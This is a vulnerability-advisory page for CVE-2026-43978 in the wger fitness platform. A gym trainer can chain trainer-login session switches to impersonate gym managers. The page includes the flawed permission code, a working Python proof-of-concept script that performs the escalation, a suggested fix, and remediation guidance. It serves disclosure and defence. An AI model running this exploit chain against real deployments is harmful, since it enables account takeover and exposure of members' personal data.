Skip to main content

wger CVE-2026-43978

HIGH
Improper Privilege Management (CWE-269)
2026-05-14 https://github.com/wger-project/wger GHSA-9qpr-vc49-hqg2
8.1
CVSS 3.1 · Vendor: https://github.com/wger-project/wger
Share

Severity by source

Vendor (https://github.com/wger-project/wger) PRIMARY
8.1 HIGH
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Primary rating from Vendor (https://github.com/wger-project/wger) · only source for this CVE.

CVSS VectorVendor: https://github.com/wger-project/wger

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
None

Lifecycle Timeline

3
Source Code Evidence Fetched
May 14, 2026 - 17:01 vuln.today
Analysis Generated
May 14, 2026 - 17:01 vuln.today
CVE Published
May 14, 2026 - 16:16 nvd
HIGH 8.1

DescriptionCVE.org

Summary

A gym trainer can escalate their session to any higher-privileged account (gym manager, general manager) by chaining two calls to the trainer-login endpoint. Once a trainer performs a legitimate switch into a low-privileged user, the session flag trainer.identity is set and this flag alone bypasses the permission check on all subsequent trainer-login calls, allowing the trainer to hop into any account including gym managers.

Details

In wger/core/views/user.py lines 169-178, the permission check uses an AND condition:

python
# Line 169 - passes if EITHER condition is false
if not request.user.has_perm('gym.gym_trainer') and not request.session.get('trainer.identity'):
    return HttpResponseForbidden()
# Line 173 - only runs when current user IS a trainer, not when identity is inherited
if request.user.has_perm('gym.gym_trainer') and (
    user.has_perm('gym.manage_gym') or user.has_perm('gym.manage_gyms')
):
    return HttpResponseForbidden()

After hop 1 (trainer → regular user), request.user is the regular user who has no gym_trainer permission, but session['trainer.identity'] is set. Line 169 evaluates: not False AND not False → the second operand short-circuits the check. Line 173 is never reached because the current user is no longer a trainer. The attacker can therefore call trainer-login again targeting a manager account and it succeeds.

PoC

Requirements: A running wger instance with at least one gym trainer account and one gym manager account in the same gym.

python
import requests

BASE = 'http://localhost:80'
s = requests.Session()

def whoami():
    r = s.get(f'{BASE}/api/v2/userprofile/',
              headers={'Accept': 'application/json'})
    return r.json().get('username')
# ─────────────────────────────────────────────
print("=" * 55)
print("  PoC: Trainer Login Privilege Escalation")
print("  wger/core/views/user.py:169")
print("=" * 55)
# ─── STEP 1: Normal login as gym trainer ─────
print("\n[STEP 1] Login as 'trainer1'")
print("         trainer1 has ONLY 'gym.gym_trainer' permission")

s.get(f'{BASE}/en/user/login')
s.post(f'{BASE}/en/user/login', data={
    'username': 'trainer1',
    'password': 'pass1234',
    'csrfmiddlewaretoken': s.cookies['csrftoken'],
})
print(f"         Current user  : {whoami()}")
print(f"         Permission    : gym.gym_trainer (NOT manage_gym)")
# ─── STEP 2: Legitimate trainer-login ────────
print("\n[STEP 2] trainer1 uses trainer-login to switch into 'regular1' (pk=4)")
print("         This is ALLOWED - trainer1 has gym_trainer permission")
print("         Side effect: session['trainer.identity'] = trainer1_pk")

s.get(f'{BASE}/en/user/4/trainer-login')
print(f"         Current user  : {whoami()}")
print(f"         Session flag  : trainer.identity is now SET")
# ─── STEP 3: EXPLOIT ─────────────────────────
print("\n[STEP 3] EXPLOIT - now as 'regular1', call trainer-login for 'manager1' (pk=3)")
print("         regular1 has ZERO permissions")
print("         BUT session['trainer.identity'] is set from Step 2")
print("         Line 169 check: `not has_perm() AND not session.get()` → BYPASSED")

s.get(f'{BASE}/en/user/3/trainer-login')
result = whoami()
print(f"         Current user  : {result}")
# ─── RESULT ──────────────────────────────────
print("\n" + "=" * 55)
if result == 'manager1':
    print("  RESULT : !! VULNERABLE !!")
    print("  trainer1 (gym_trainer) is now logged in as manager1")
    print("  manager1 has 'gym.manage_gym' - full gym admin access")
else:
    print("  RESULT : Not vulnerable (got: " + result + ")")
print("=" * 55)

Output on wger 2.5.0a2:

<img width="728" height="628" alt="image" src="https://github.com/user-attachments/assets/3e8affa3-4728-480c-bb57-929f66723ea5" />

Impact

Any authenticated gym trainer can take over a gym manager or general gym manager account within the same gym. This grants full gym administration capabilities including viewing all member data, modifying contracts, managing gym configuration, and accessing other trainers' and managers' personal information.

How to fix

The root cause is a logical error in wger/core/views/user.py at line 169. The AND operator means that if session['trainer.identity'] is set, the entire permission check is skipped - allowing any user who has previously been switched into to perform further trainer-login hops without holding the gym.gym_trainer permission themselves. Additionally, the target-user protection block at line 173 only executes when request.user is a trainer, so it never fires during a chained hop.

Vulnerable code (user.py:169-178):

if not request.user.has_perm('gym.gym_trainer') and not request.session.get('trainer.identity'):
    return HttpResponseForbidden()

if request.user.has_perm('gym.gym_trainer') and (
    user.has_perm('gym.gym_trainer')
    or user.has_perm('gym.manage_gym')
    or user.has_perm('gym.manage_gyms')
):
    return HttpResponseForbidden()

Suggested fix:

trainer_identity_pk = request.session.get('trainer.identity')

if not request.user.has_perm('gym.gym_trainer'):
    if not trainer_identity_pk:
        return HttpResponseForbidden()
# Verify the original trainer in the session still holds the permission
    original_trainer = get_object_or_404(User, pk=trainer_identity_pk)
    if not original_trainer.has_perm('gym.gym_trainer'):
        return HttpResponseForbidden()
# Target-user check must apply in both direct and chained hop scenarios
if (request.user.has_perm('gym.gym_trainer') or trainer_identity_pk) and (
    user.has_perm('gym.gym_trainer')
    or user.has_perm('gym.manage_gym')
    or user.has_perm('gym.manage_gyms')
):
    return HttpResponseForbidden()

AnalysisAI

Privilege escalation in wger fitness manager allows gym trainers to impersonate gym managers via session-chain attack. An authenticated trainer exploits flawed session-flag logic in the trainer-login endpoint to bypass permission checks - first switching into a low-privilege user, then leveraging the inherited 'trainer.identity' session flag to hop into manager accounts. Publicly available proof-of-concept demonstrates complete takeover of gym administration with CVSS 8.1 (network-accessible, low complexity). No vendor patch confirmed at time of analysis; vulnerability actively disclosed by wger-project GitHub advisory GHSA-9qpr-vc49-hqg2. EPSS score not available, not in CISA KEV. Root cause is CWE-269 (improper privilege management) in core/views/user.py lines 169-178.

Technical ContextAI

wger is a Python-based open-source fitness/workout management platform (pip package wger). The vulnerability resides in the trainer-login session-switching mechanism, implemented in wger/core/views/user.py. The endpoint permits gym trainers (role 'gym.gym_trainer') to impersonate gym members for training purposes. The permission check at line 169 uses short-circuit AND logic ('not has_perm AND not session_flag'), allowing the session flag alone to authorize subsequent switches after the first legitimate hop. This is a CWE-269 (Improper Privilege Management) flaw - the authorization check relies on a mutable session attribute rather than validating the original authenticated user's persistent role. The design confuses 'current request user' with 'original authorizing user', creating a TOCTOU (Time-of-Check-Time-of-Use) gap across chained requests. CPE pkg:pip/wger identifies affected deployments; versions ≤2.5.0a2 are confirmed vulnerable per advisory.

RemediationAI

No vendor-released patched version is confirmed at time of analysis - the advisory lists 'fixed in: None'. Organizations should monitor https://github.com/wger-project/wger/security/advisories/GHSA-9qpr-vc49-hqg2 for patch release announcements. Interim compensating controls: (1) Apply the suggested code fix from the advisory (wger/core/views/user.py lines 169-178) by manually patching the installation - replaces AND logic with explicit validation of original trainer's persistent permissions. Trade-off: requires code modification and testing; breaks on upstream updates. (2) Disable the trainer-login endpoint entirely by removing URL route if session-switching is not operationally required. Trade-off: eliminates legitimate trainer workflow for member impersonation. (3) Implement application-layer firewall rules to block repeated POST/GET to /en/user/{id}/trainer-login within single session if endpoint must remain active. Trade-off: may block legitimate multi-user training sessions; requires WAF with session tracking. (4) Enforce strict audit logging and anomalous privilege-switch detection (trainer→manager hops) with immediate session revocation. Trade-off: detective not preventive; requires SIEM integration. (5) Apply principle of least privilege by reviewing gym trainer role assignments and removing 'gym.gym_trainer' permission from accounts not requiring session-switching. Trade-off: operational overhead; does not eliminate risk from remaining trainers. Priority: organizations handling sensitive member health data (GDPR, HIPAA contexts) should apply code patch or disable endpoint immediately pending official release.

More in Python

View all
CVE-2025-24016 CRITICAL POC
9.9 Feb 10

Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t

CVE-2025-27520 CRITICAL POC
9.8 Apr 04

BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser

CVE-2025-2945 CRITICAL POC
9.9 Apr 03

pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi

CVE-2013-5093 MEDIUM POC
6.8 Sep 27

The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python

CVE-2025-32375 CRITICAL POC
9.8 Apr 09

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica

CVE-2014-0224 HIGH POC
7.4 Jun 05

OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph

CVE-2024-21644 HIGH POC
7.5 Jan 08

pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.

CVE-2017-9462 HIGH POC
8.8 Jun 06

In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2024-21645 MEDIUM POC
5.3 Jan 08

pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne

CVE-2026-33017 CRITICAL POC
9.3 Mar 17

Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301

CVE-2026-55255 HIGH POC
8.4 Jun 19

Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing

Share

CVE-2026-43978 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy